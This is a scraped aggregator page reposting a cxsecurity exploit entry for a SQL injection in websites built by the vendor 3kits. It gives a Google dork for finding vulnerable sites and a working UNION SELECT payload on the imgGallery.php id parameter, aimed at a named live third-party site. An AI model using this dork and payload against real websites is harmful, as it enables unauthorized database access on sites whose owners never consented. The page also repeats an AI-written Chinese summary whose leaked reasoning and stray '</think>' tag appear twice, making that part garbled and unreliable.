3kits template via imgGallery.php SQL Injection id parameter
嗯,用户让我帮忙总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,找出关键信息。 文章标题是“3kits - Sql Injection”,看起来是关于SQL注入漏洞的。Google Dork是“Designed & Developed by 3kits”,说明这是针对3kits公司开发的网站的漏洞。日期是2025年11月2日,作者是Hossein_0xB,类别是webapps,测试环境是Windows 10。 证明概念部分有一个链接,展示了如何利用这个漏洞,比如在imgGallery.php?id=-3后面添加union select语句来提取信息。参考链接包括3kits的官网和OWASP关于SQL注入的页面。 用户可能需要一个简洁明了的总结,用于报告或快速了解漏洞情况。所以我要把重点放在漏洞名称、影响范围、利用方法和参考资源上。 总结的时候要注意字数限制,确保不超过100字,并且直接描述内容,不使用特定开头。这样用户就能快速获取关键信息了。 </think> 文章描述了一个针对3kits开发的网站存在的SQL注入漏洞,通过构造特定URL可提取数据库信息。该漏洞影响使用相关技术的Web应用程序,并提供了POC链接和参考资料供进一步研究。 2025-11-7 22:42:34 Author: cxsecurity.com(查看原文) 阅读量:9 收藏
嗯,用户让我帮忙总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,找出关键信息。 文章标题是“3kits - Sql Injection”,看起来是关于SQL注入漏洞的。Google Dork是“Designed & Developed by 3kits”,说明这是针对3kits公司开发的网站的漏洞。日期是2025年11月2日,作者是Hossein_0xB,类别是webapps,测试环境是Windows 10。 证明概念部分有一个链接,展示了如何利用这个漏洞,比如在imgGallery.php?id=-3后面添加union select语句来提取信息。参考链接包括3kits的官网和OWASP关于SQL注入的页面。 用户可能需要一个简洁明了的总结,用于报告或快速了解漏洞情况。所以我要把重点放在漏洞名称、影响范围、利用方法和参考资源上。 总结的时候要注意字数限制,确保不超过100字,并且直接描述内容,不使用特定开头。这样用户就能快速获取关键信息了。 </think> 文章描述了一个针对3kits开发的网站存在的SQL注入漏洞,通过构造特定URL可提取数据库信息。该漏洞影响使用相关技术的Web应用程序,并提供了POC链接和参考资料供进一步研究。 2025-11-7 22:42:34 Author: cxsecurity.com(查看原文) 阅读量:9 收藏
#Exploit Title: 3kits - Sql Injection #Google Dork: "Designed & Developed by 3kits" #Date: 2025-11-02 #Exploit Author: Hossein_0xB #Category: webapps #Tested on : Windows 10 #CVE : Proof of Concept: ### Demo : https://hyderabadrealtors.org/imgGallery.php?id=-3 union select 1,version(),3,4 ********************************************************* #Discovered by: Hossein_0xB #Email: [email protected] *********************************************************
References:
https://www.3kits.com/
(vendor website if available)
https://owasp.org/www-community/attacks/SQL_Injection
Thanks for you comment!
Your message is in quarantine 48 hours.
文章来源: https://cxsecurity.com/issue/WLB-2025110007
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh